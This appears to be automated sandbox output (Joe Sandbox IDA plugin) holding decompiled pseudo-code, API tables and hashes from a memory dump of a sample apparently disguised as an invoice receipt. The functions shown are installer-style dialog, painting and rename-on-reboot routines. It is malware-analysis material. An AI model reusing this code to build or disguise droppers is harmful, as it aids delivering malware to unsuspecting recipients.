									__eflags =  *_t130 - _t133;
									if( *_t130 <= _t133) {
										goto L58;
									}
									_t73 = CreateDialogParamA( *0x423ea0,  *_t130 +  *0x423680 & 0x0000ffff, _t125,  *(0x4091c0 +  *(_t130 + 4) * 4), _t130);
									__eflags = _t73 - _t133;
									 *0x423678 = _t73;
									if(_t73 == _t133) {
										goto L58;
									}
									_push( *((intOrPtr*)(_t130 + 0x2c)));
									_push(6);
									E00403E37(_t73);
									GetWindowRect(GetDlgItem(_t125, 0x3fa), _t134 + 0x10);
									ScreenToClient(_t125, _t134 + 0x10);
									SetWindowPos( *0x423678, _t133,  *(_t134 + 0x20),  *(_t134 + 0x20), _t133, _t133, 0x15);
									_push(_t133);
									E00401389( *((intOrPtr*)(_t130 + 0xc)));
									__eflags =  *0x42366c - _t133;
									if( *0x42366c != _t133) {
										goto L61;
									}
									ShowWindow( *0x423678, 8);
									E00403E83(0x405);
									goto L58;
								}
								__eflags =  *0x423f2c - _t133;
								if( *0x423f2c != _t133) {
									goto L61;
								}
								__eflags =  *0x423f20 - _t133;
								if( *0x423f20 != _t133) {
									continue;
								}
								goto L61;
							}
						}
						DestroyWindow( *0x423678);
						 *0x423ea8 = _t133;
						EndDialog(_t125,  *0x41f860);
						goto L58;
					} else {
						__eflags = _t35 - 1;
						if(_t35 != 1) {
							L33:
							__eflags =  *_t130 - _t133;
							if( *_t130 == _t133) {
								goto L61;
							}
							goto L34;
						}
						_push(0);
						_t86 = E00401389( *((intOrPtr*)(_t130 + 0x10)));
						__eflags = _t86;
						if(_t86 == 0) {
							goto L33;
						}
						SendMessageA( *0x423678, 0x40f, 0, 1);
						__eflags =  *0x42366c;
						return 0 |  *0x42366c == 0x00000000;
					}
				} else {
					_t125 = _a4;
					_t133 = 0;
					if(_t115 == 0x47) {
						SetWindowPos( *0x420470, _t125, 0, 0, 0, 0, 0x13);
					}
					if(_t115 == 5) {
						asm("sbb eax, eax");
						ShowWindow( *0x420470,  ~(_a12 - 1) & _t115);
					}
					if(_t115 != 0x40d) {
						__eflags = _t115 - 0x11;
						if(_t115 != 0x11) {
							__eflags = _t115 - 0x111;
							if(_t115 != 0x111) {
								L26:
								return E00403E9E(_t115, _a12, _a16);
							}
							_t132 = _a12 & 0x0000ffff;
							_t126 = GetDlgItem(_t125, _t132);
							__eflags = _t126 - _t133;
							if(_t126 == _t133) {
								L13:
								__eflags = _t132 - 1;
								if(_t132 != 1) {
									__eflags = _t132 - 3;
									if(_t132 != 3) {
										_t127 = 2;
										__eflags = _t132 - _t127;
										if(_t132 != _t127) {
											L25:
											SendMessageA( *0x423678, 0x111, _a12, _a16);
											goto L26;
										}
										__eflags =  *0x423f2c - _t133;
										if( *0x423f2c == _t133) {
											_t99 = E0040140B(3);
											__eflags = _t99;
											if(_t99 != 0) {
												goto L26;
											}
											 *0x41f860 = 1;
											L21:
											_push(0x78);
											L22:
											E00403E10();
											goto L26;
										}
										E0040140B(_t127);
										 *0x41f860 = _t127;
										goto L21;
									}
									__eflags =  *0x4091bc - _t133; // 0xffffffff
									if(__eflags <= 0) {
										goto L25;
									}
									_push(0xffffffff);
									goto L22;
								}
								_push(_t132);
								goto L22;
							}
							SendMessageA(_t126, 0xf3, _t133, _t133);
							_t103 = IsWindowEnabled(_t126);
							__eflags = _t103;
							if(_t103 == 0) {
								goto L61;
							}
							goto L13;
						}
						SetWindowLongA(_t125, _t133, _t133);
						return 1;
					} else {
						DestroyWindow( *0x423678);
						 *0x423678 = _a12;
						L58:
						if( *0x421498 == _t133 &&  *0x423678 != _t133) {
							ShowWindow(_t125, 0xa);
							 *0x421498 = 1;
						}
						L61:
						return 0;
					}
				}
			}

0x0040396d
0x00403976
0x00403ab7
0x00403abb
0x00403abf
0x00403ac1
0x00403ac6
0x00403ad1
0x00403adc
0x00403ae1
0x00403ae3
0x00403ae5
0x00403ae8
0x00403aed
0x00403afb
0x00403b08
0x00403b0f
0x00403b0f
0x00403b10
0x00403b10
0x00403b15
0x00403b1b
0x00403b22
0x00403b28
0x00403b2a
0x00403b6a
0x00403b6f
0x00403b74
0x00403b74
0x00403b79
0x00403b82
0x00403b84
0x00403b89
0x00403b8f
0x00403b93
0x00403b93
0x00403b98
0x00403b9e
0x00000000
0x00000000
0x00403ba9
0x00403baf
0x00000000
0x00000000
0x00403bb8
0x00403bc0
0x00403bc5
0x00403bc8
0x00403bce
0x00403bd3
0x00403bd6
0x00403bdc
0x00403be1
0x00403be4
0x00403bea
0x00403bf2
0x00403bf8
0x00403bfe
0x00403c02
0x00403c09
0x00403c09
0x00403c09
0x00403c13
0x00403c25
0x00403c31
0x00403c36
0x00403c40
0x00403c46
0x00403c48
0x00403c4d
0x00403c4a
0x00403c4a
0x00403c4a
0x00403c5d
0x00403c75
0x00403c77
0x00403c7d
0x00403c92
0x00403c7f
0x00403c88
0x00403c8a
0x00403c8a
0x00403c98
0x00403ca8
0x00403cb9
0x00403cc0
0x00403cc6
0x00403cca
0x00403ccf
0x00403cd1
0x00000000
0x00403cd7
0x00403cd7
0x00403cd9
0x00000000
0x00000000
0x00403cdf
0x00403ce3
0x00403d08
0x00403d0e
0x00403d14
0x00403d16
0x00000000
0x00000000
0x00403d3c
0x00403d42
0x00403d44
0x00403d49
0x00000000
0x00000000
0x00403d4f
0x00403d52
0x00403d55
0x00403d6c
0x00403d78
0x00403d91
0x00403d97
0x00403d9b
0x00403da0
0x00403da6
0x00000000
0x00000000
0x00403db0
0x00403dbb
0x00000000
0x00403dbb
0x00403ce5
0x00403ceb
0x00000000
0x00000000
0x00403cf1
0x00403cf7
0x00000000
0x00000000
0x00000000
0x00403cfd
0x00403cd1
0x00403dc8
0x00403dd4
0x00403ddb
0x00000000
0x00403b2c
0x00403b2c
0x00403b2f
0x00403b62
0x00403b62
0x00403b64
0x00000000
0x00000000
0x00000000
0x00403b64
0x00403b31
0x00403b35
0x00403b3a
0x00403b3c
0x00000000
0x00000000
0x00403b4c
0x00403b54
0x00000000
0x00403b5a
0x00403988
0x00403988
0x0040398c
0x00403991
0x004039a0
0x004039a0
0x004039a9
0x004039b2
0x004039bd
0x004039bd
0x004039c9
0x004039e5
0x004039e8
0x004039fb
0x00403a01
0x00403aa4
0x00000000
0x00403aad
0x00403a07
0x00403a14
0x00403a16
0x00403a18
0x00403a37
0x00403a37
0x00403a3a
0x00403a3f
0x00403a42
0x00403a52
0x00403a53
0x00403a55
0x00403a8b
0x00403a9e
0x00000000
0x00403a9e
0x00403a57
0x00403a5d
0x00403a76
0x00403a7b
0x00403a7d
0x00000000
0x00000000
0x00403a7f
0x00403a6b
0x00403a6b
0x00403a6d
0x00403a6d
0x00000000
0x00403a6d
0x00403a60
0x00403a65
0x00000000
0x00403a65
0x00403a44
0x00403a4a
0x00000000
0x00000000
0x00403a4c
0x00000000
0x00403a4c
0x00403a3c
0x00000000
0x00403a3c
0x00403a22
0x00403a29
0x00403a2f
0x00403a31
0x00000000
0x00000000
0x00000000
0x00403a31
0x004039ed
0x00000000
0x004039cb
0x004039d1
0x004039db
0x00403de1
0x00403de7
0x00403df4
0x00403dfa
0x00403dfa
0x00403e04
0x00000000
0x00403e04
0x004039c9

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004039A0
ShowWindow.USER32(?), ref: 004039BD
DestroyWindow.USER32 ref: 004039D1
SetWindowLongA.USER32(?,00000000,00000000), ref: 004039ED
GetDlgItem.USER32 ref: 00403A0E
SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403A22
IsWindowEnabled.USER32(00000000), ref: 00403A29
GetDlgItem.USER32 ref: 00403AD7
GetDlgItem.USER32 ref: 00403AE1
SetClassLongA.USER32(?,000000F2,?,0000001C,000000FF), ref: 00403AFB
SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403B4C
GetDlgItem.USER32 ref: 00403BF2
ShowWindow.USER32(00000000,?), ref: 00403C13
EnableWindow.USER32(?,?), ref: 00403C25
EnableWindow.USER32(?,?), ref: 00403C40
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403C56
EnableMenuItem.USER32 ref: 00403C5D
SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403C75
SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403C88
lstrlenA.KERNEL32(00420498,?,00420498,004236A0), ref: 00403CB1
SetWindowTextA.USER32(?,00420498), ref: 00403CC0
ShowWindow.USER32(?,0000000A), ref: 00403DF4

Memory Dump Source

Source File: 00000000.00000002.295549873.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.295519820.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.295621843.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.295638636.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.295788784.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.295800673.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.295840068.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.295878649.000000000042E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296115912.000000000046E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_G2M8C76V_INV0ICE_RECEIPT.jbxd

Similarity

API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
String ID:
API String ID: 184305955-0
Opcode ID: 71dbbfc470e5b7342f3a842f49b25357194f1f96d8345790fbe5660f06a32eef
Instruction ID: caafd2a66b76c4ae3962cc82e2ded254e31ce9ec1c8840106f3b43a2641cb278
Opcode Fuzzy Hash: 71dbbfc470e5b7342f3a842f49b25357194f1f96d8345790fbe5660f06a32eef
Instruction Fuzzy Hash: 95C1AF71A04204BBDB206F21ED85E2B7E7CEB05706F40453EF641B12E1C779AA429F6E

Uniqueness

Uniqueness Score: -1.00%

Function 00403F7F, Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 204
windowstringCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E00403F7F(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, int _a16) {
				char _v8;
				signed int _v12;
				void* _v16;
				struct HWND__* _t52;
				long _t86;
				int _t98;
				struct HWND__* _t99;
				signed int _t100;
				intOrPtr _t103;
				intOrPtr _t109;
				int _t110;
				signed int* _t112;
				signed int _t113;
				char* _t114;
				CHAR* _t115;

				if(_a8 != 0x110) {
					if(_a8 != 0x111) {
						L11:
						if(_a8 != 0x4e) {
							if(_a8 == 0x40b) {
								 *0x420478 =  *0x420478 + 1;
							}
							L25:
							_t110 = _a16;
							L26:
							return E00403E9E(_a8, _a12, _t110);
						}
						_t52 = GetDlgItem(_a4, 0x3e8);
						_t110 = _a16;
						if( *((intOrPtr*)(_t110 + 8)) == 0x70b &&  *((intOrPtr*)(_t110 + 0xc)) == 0x201) {
							_t100 =  *((intOrPtr*)(_t110 + 0x1c));
							_t109 =  *((intOrPtr*)(_t110 + 0x18));
							_v12 = _t100;
							_v16 = _t109;
							_v8 = 0x422e40;
							if(_t100 - _t109 < 0x800) {
								SendMessageA(_t52, 0x44b, 0,  &_v16);
								SetCursor(LoadCursorA(0, 0x7f02));
								_t40 =  &_v8; // 0x422e40
								ShellExecuteA(_a4, "open",  *_t40, 0, 0, 1);
								SetCursor(LoadCursorA(0, 0x7f00));
								_t110 = _a16;
							}
						}
						if( *((intOrPtr*)(_t110 + 8)) != 0x700 ||  *((intOrPtr*)(_t110 + 0xc)) != 0x100) {
							goto L26;
						} else {
							if( *((intOrPtr*)(_t110 + 0x10)) == 0xd) {
								SendMessageA( *0x423ea8, 0x111, 1, 0);
							}
							if( *((intOrPtr*)(_t110 + 0x10)) == 0x1b) {
								SendMessageA( *0x423ea8, 0x10, 0, 0);
							}
							return 1;
						}
					}
					if(_a12 >> 0x10 != 0 ||  *0x420478 != 0) {
						goto L25;
					} else {
						_t103 =  *0x41fc68; // 0x0
						_t25 = _t103 + 0x14; // 0x14
						_t112 = _t25;
						if(( *_t112 & 0x00000020) == 0) {
							goto L25;
						}
						 *_t112 =  *_t112 & 0xfffffffe | SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
						E00403E59(SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
						E0040420A();
						goto L11;
					}
				}
				_t98 = _a16;
				_t113 =  *(_t98 + 0x30);
				if(_t113 < 0) {
					_t113 =  *( *0x42367c - 4 + _t113 * 4);
				}
				_push( *((intOrPtr*)(_t98 + 0x34)));
				_t114 = _t113 +  *0x423ed8;
				_push(0x22);
				_a16 =  *_t114;
				_v12 = _v12 & 0x00000000;
				_t115 = _t114 + 1;
				_v16 = _t115;
				_v8 = E00403F4B;
				E00403E37(_a4);
				_push( *((intOrPtr*)(_t98 + 0x38)));
				_push(0x23);
				E00403E37(_a4);
				CheckDlgButton(_a4, (0 | ( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
				E00403E59( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001);
				_t99 = GetDlgItem(_a4, 0x3e8);
				E00403E6C(_t99);
				SendMessageA(_t99, 0x45b, 1, 0);
				_t86 =  *( *0x423eb0 + 0x68);
				if(_t86 < 0) {
					_t86 = GetSysColor( ~_t86);
				}
				SendMessageA(_t99, 0x443, 0, _t86);
				SendMessageA(_t99, 0x445, 0, 0x4010000);
				 *0x41f45c =  *0x41f45c & 0x00000000;
				SendMessageA(_t99, 0x435, 0, lstrlenA(_t115));
				SendMessageA(_t99, 0x449, _a16,  &_v16);
				 *0x420478 =  *0x420478 & 0x00000000;
				return 0;
			}

0x00403f8f
0x004040b5
0x00404111
0x00404115
0x004041ec
0x004041ee
0x004041ee
0x004041f4
0x004041f4
0x004041f7
0x00000000
0x004041fe
0x00404123
0x00404125
0x0040412f
0x0040413a
0x0040413d
0x00404140
0x0040414b
0x0040414e
0x00404155
0x00404163
0x0040417b
0x00404183
0x0040418e
0x0040419e
0x004041a0
0x004041a0
0x00404155
0x004041aa
0x00000000
0x004041b5
0x004041b9
0x004041ca
0x004041ca
0x004041d0
0x004041de
0x004041de
0x00000000
0x004041e2
0x004041aa
0x004040c0
0x00000000
0x004040d4
0x004040d4
0x004040da
0x004040da
0x004040e0
0x00000000
0x00000000
0x00404105
0x00404107
0x0040410c
0x00000000
0x0040410c
0x004040c0
0x00403f95
0x00403f98
0x00403f9d
0x00403fae
0x00403fae
0x00403fb5
0x00403fb8
0x00403fba
0x00403fbf
0x00403fc8
0x00403fce
0x00403fda
0x00403fdd
0x00403fe6
0x00403feb
0x00403fee
0x00403ff3
0x0040400a
0x00404011
0x00404024
0x00404027
0x0040403c
0x00404043
0x00404048
0x0040404d
0x0040404d
0x0040405c
0x0040406b
0x0040406d
0x00404083
0x00404092
0x00404094
0x00000000

APIs

CheckDlgButton.USER32 ref: 0040400A
GetDlgItem.USER32 ref: 0040401E
SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 0040403C
GetSysColor.USER32(?), ref: 0040404D
SendMessageA.USER32(00000000,00000443,00000000,?), ref: 0040405C
SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 0040406B
lstrlenA.KERNEL32(?), ref: 00404075
SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 00404083
SendMessageA.USER32(00000000,00000449,?,00000110), ref: 00404092
GetDlgItem.USER32 ref: 004040F5
SendMessageA.USER32(00000000), ref: 004040F8
GetDlgItem.USER32 ref: 00404123
SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 00404163
LoadCursorA.USER32 ref: 00404172
SetCursor.USER32(00000000), ref: 0040417B
ShellExecuteA.SHELL32(0000070B,open,@.B,00000000,00000000,00000001), ref: 0040418E
LoadCursorA.USER32 ref: 0040419B
SetCursor.USER32(00000000), ref: 0040419E
SendMessageA.USER32(00000111,00000001,00000000), ref: 004041CA
SendMessageA.USER32(00000010,00000000,00000000), ref: 004041DE

Strings

N, xrefs: 00404111
open, xrefs: 00404186
@.B, xrefs: 00404183

Memory Dump Source

Source File: 00000000.00000002.295549873.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.295519820.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.295621843.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.295638636.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.295788784.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.295800673.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.295840068.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.295878649.000000000042E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296115912.000000000046E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_G2M8C76V_INV0ICE_RECEIPT.jbxd

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
String ID: @.B$N$open
API String ID: 3615053054-3815657624
Opcode ID: 086c9584272f405e5d23a234cb3672cb38a546f38c26fc4f0f37582571ec5c76
Instruction ID: c3de460066171d4a99b3db8707b5a70307f179c1ca483427b8a670d92431fbf8
Opcode Fuzzy Hash: 086c9584272f405e5d23a234cb3672cb38a546f38c26fc4f0f37582571ec5c76
Instruction Fuzzy Hash: 4E61C3B1A40209BFEB109F60CC45B6A7B69FB54715F108136FB04BA2D1C7B8A951CFA8

Uniqueness

Uniqueness Score: -1.00%

Function 00401000, Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
				struct tagLOGBRUSH _v16;
				struct tagRECT _v32;
				struct tagPAINTSTRUCT _v96;
				struct HDC__* _t70;
				struct HBRUSH__* _t87;
				struct HFONT__* _t94;
				long _t102;
				signed int _t126;
				struct HDC__* _t128;
				intOrPtr _t130;

				if(_a8 == 0xf) {
					_t130 =  *0x423eb0;
					_t70 = BeginPaint(_a4,  &_v96);
					_v16.lbStyle = _v16.lbStyle & 0x00000000;
					_a8 = _t70;
					GetClientRect(_a4,  &_v32);
					_t126 = _v32.bottom;
					_v32.bottom = _v32.bottom & 0x00000000;
					while(_v32.top < _t126) {
						_a12 = _t126 - _v32.top;
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
						_t87 = CreateBrushIndirect( &_v16);
						_v32.bottom = _v32.bottom + 4;
						_a16 = _t87;
						FillRect(_a8,  &_v32, _t87);
						DeleteObject(_a16);
						_v32.top = _v32.top + 4;
					}
					if( *(_t130 + 0x58) != 0xffffffff) {
						_t94 = CreateFontIndirectA( *(_t130 + 0x34));
						_a16 = _t94;
						if(_t94 != 0) {
							_t128 = _a8;
							_v32.left = 0x10;
							_v32.top = 8;
							SetBkMode(_t128, 1);
							SetTextColor(_t128,  *(_t130 + 0x58));
							_a8 = SelectObject(_t128, _a16);
							DrawTextA(_t128, 0x4236a0, 0xffffffff,  &_v32, 0x820);
							SelectObject(_t128, _a8);
							DeleteObject(_a16);
						}
					}
					EndPaint(_a4,  &_v96);
					return 0;
				}
				_t102 = _a16;
				if(_a8 == 0x46) {
					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
					 *((intOrPtr*)(_t102 + 4)) =  *0x423ea8;
				}
				return DefWindowProcA(_a4, _a8, _a12, _t102);
			}

0x0040100a
0x00401039
0x00401047
0x0040104d
0x00401051
0x0040105b
0x00401061
0x00401064
0x004010f3
0x00401089
0x0040108c
0x004010a6
0x004010bd
0x004010cc
0x004010cf
0x004010d5
0x004010d9
0x004010e4
0x004010ed
0x004010ef
0x004010ef
0x00401100
0x00401105
0x0040110d
0x00401110
0x00401112
0x00401118
0x0040111f
0x00401126
0x00401130
0x00401142
0x00401156
0x00401160
0x00401165
0x00401165
0x00401110
0x0040116e
0x00000000
0x00401178
0x00401010
0x00401013
0x00401015
0x0040101f
0x0040101f
0x00000000

APIs

DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32 ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32 ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectA.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,00000001), ref: 00401126
SetTextColor.GDI32(00000000,000000FF), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextA.USER32(00000000,004236A0,000000FF,00000010,00000820), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 00000000.00000002.295549873.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.295519820.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.295621843.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.295638636.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.295788784.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.295800673.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.295840068.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.295878649.000000000042E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296115912.000000000046E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_G2M8C76V_INV0ICE_RECEIPT.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: 1fa3053a276be56ef7da5d68adfba1d9971bfb9fa2beb597bf2db4fb963a824d
Instruction ID: 81477e3a2fde3fb3f26aa953fc06e347994717d76cab2c79682594c458f31f57
Opcode Fuzzy Hash: 1fa3053a276be56ef7da5d68adfba1d9971bfb9fa2beb597bf2db4fb963a824d
Instruction Fuzzy Hash: 8141BC71804249AFCB058FA4CD459BFBFB9FF44314F00802AF551AA1A0C378EA54DFA5

Uniqueness

Uniqueness Score: -1.00%

Function 004057D3, Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 144
filememoryCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E004057D3() {
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t15;
				long _t16;
				int _t20;
				void* _t28;
				long _t29;
				intOrPtr* _t37;
				int _t43;
				void* _t44;
				long _t47;
				CHAR* _t49;
				void* _t51;
				void* _t53;
				intOrPtr* _t54;
				void* _t55;
				void* _t56;

				_t15 = E00405DA3(1);
				_t49 =  *(_t55 + 0x18);
				if(_t15 != 0) {
					_t20 =  *_t15( *(_t55 + 0x1c), _t49, 5);
					if(_t20 != 0) {
						L16:
						 *0x423f30 =  *0x423f30 + 1;
						return _t20;
					}
				}
				 *0x422628 = 0x4c554e;
				if(_t49 == 0) {
					L5:
					_t16 = GetShortPathNameA( *(_t55 + 0x1c), 0x4220a0, 0x400);
					if(_t16 != 0 && _t16 <= 0x400) {
						_t43 = wsprintfA(0x421ca0, "%s=%s\r\n", 0x422628, 0x4220a0);
						_t56 = _t55 + 0x10;
						E00405AA7(_t43, 0x400, 0x4220a0, 0x4220a0,  *((intOrPtr*)( *0x423eb0 + 0x128)));
						_t20 = E0040575C(0x4220a0, 0xc0000000, 4);
						_t53 = _t20;
						 *(_t56 + 0x14) = _t53;
						if(_t53 == 0xffffffff) {
							goto L16;
						}
						_t47 = GetFileSize(_t53, 0);
						_t7 = _t43 + 0xa; // 0xa
						_t51 = GlobalAlloc(0x40, _t47 + _t7);
						if(_t51 == 0 || ReadFile(_t53, _t51, _t47, _t56 + 0x18, 0) == 0 || _t47 !=  *(_t56 + 0x18)) {
							L15:
							_t20 = CloseHandle(_t53);
							goto L16;
						} else {
							if(E004056D1(_t51, "[Rename]\r\n") != 0) {
								_t28 = E004056D1(_t26 + 0xa, 0x409348);
								if(_t28 == 0) {
									L13:
									_t29 = _t47;
									L14:
									E0040571D(_t51 + _t29, 0x421ca0, _t43);
									SetFilePointer(_t53, 0, 0, 0);
									WriteFile(_t53, _t51, _t47 + _t43, _t56 + 0x18, 0);
									GlobalFree(_t51);
									goto L15;
								}
								_t37 = _t28 + 1;
								_t44 = _t51 + _t47;
								_t54 = _t37;
								if(_t37 >= _t44) {
									L21:
									_t53 =  *(_t56 + 0x14);
									_t29 = _t37 - _t51;
									goto L14;
								} else {
									goto L20;
								}
								do {
									L20:
									 *((char*)(_t43 + _t54)) =  *_t54;
									_t54 = _t54 + 1;
								} while (_t54 < _t44);
								goto L21;
							}
							E00405A85(_t51 + _t47, "[Rename]\r\n");
							_t47 = _t47 + 0xa;
							goto L13;
						}
					}
				} else {
					CloseHandle(E0040575C(_t49, 0, 1));
					_t16 = GetShortPathNameA(_t49, 0x422628, 0x400);
					if(_t16 != 0 && _t16 <= 0x400) {
						goto L5;
					}
				}
				return _t16;
			}

0x004057d9
0x004057e0
0x004057e4
0x004057ed
0x004057f1
0x00405930
0x00405930
0x00000000
0x00405930
0x004057f1
0x004057fd
0x00405813
0x0040583b
0x00405846
0x0040584a
0x0040586a
0x00405871
0x0040587b
0x00405888
0x0040588d
0x00405892
0x00405896
0x00000000
0x00000000
0x004058a5
0x004058a7
0x004058b4
0x004058b8
0x00405929
0x0040592a
0x00000000
0x004058d4
0x004058e1
0x00405946
0x0040594d
0x004058f4
0x004058f4
0x004058f6
0x004058ff
0x0040590a
0x0040591c
0x00405923
0x00000000
0x00405923
0x0040594f
0x00405950
0x00405955
0x00405957
0x00405964
0x00405964
0x00405968
0x00000000
0x00000000
0x00000000
0x00000000
0x00405959
0x00405959
0x0040595c
0x0040595f
0x00405960
0x00000000
0x00405959
0x004058ec
0x004058f1
0x00000000
0x004058f1
0x004058b8
0x00405815
0x00405820
0x00405829
0x0040582d
0x00000000
0x00000000
0x0040582d
0x0040593a

APIs

Part of subcall function 00405DA3: GetModuleHandleA.KERNEL32(?,?,00000000,00403268,00000008), ref: 00405DB5
Part of subcall function 00405DA3: LoadLibraryA.KERNELBASE(?,?,00000000,00403268,00000008), ref: 00405DC0
Part of subcall function 00405DA3: GetProcAddress.KERNEL32(00000000,?), ref: 00405DD1

CloseHandle.KERNEL32(00000000,?,00000000,00000001,00000001,?,00000000,?,?,00405568,?,00000000,000000F1,?), ref: 00405820
GetShortPathNameA.KERNEL32 ref: 00405829
GetShortPathNameA.KERNEL32 ref: 00405846
wsprintfA.USER32 ref: 00405864
GetFileSize.KERNEL32(00000000,00000000,004220A0,C0000000,00000004,004220A0,?,?,?,00000000,000000F1,?), ref: 0040589F
GlobalAlloc.KERNEL32(00000040,0000000A,?,?,00000000,000000F1,?), ref: 004058AE
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,000000F1,?), ref: 004058C4
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,00421CA0,00000000,-0000000A,00409348,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040590A
WriteFile.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000000,000000F1,?), ref: 0040591C
GlobalFree.KERNEL32 ref: 00405923
CloseHandle.KERNEL32(00000000,?,?,00000000,000000F1,?), ref: 0040592A

Part of subcall function 004056D1: lstrlenA.KERNEL32(00000000,?,00000000,00000000,004058DF,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004056D8
Part of subcall function 004056D1: lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,004058DF,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405708

Strings

[Rename], xrefs: 004058D4, 004058E6
(&B, xrefs: 0040580E
%s=%s, xrefs: 0040585A

Memory Dump Source

Source File: 00000000.00000002.295549873.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.295519820.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.295621843.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.295638636.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.295788784.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.295800673.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.295840068.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.295878649.000000000042E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296115912.000000000046E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_G2M8C76V_INV0ICE_RECEIPT.jbxd

Similarity

API ID: File$Handle$CloseGlobalNamePathShortlstrlen$AddressAllocFreeLibraryLoadModulePointerProcReadSizeWritewsprintf
String ID: %s=%s$(&B$[Rename]
API String ID: 3772915668-1834469719
Opcode ID: 59f55a9dc5d97f07b1302869ed359d77eb01a2f99cc6c2b796ec22a8fd90dab3
Instruction ID: f113039d6a8e0b98787bbcb52898fefdd985450d1919188b96c4478b1d7dfea3
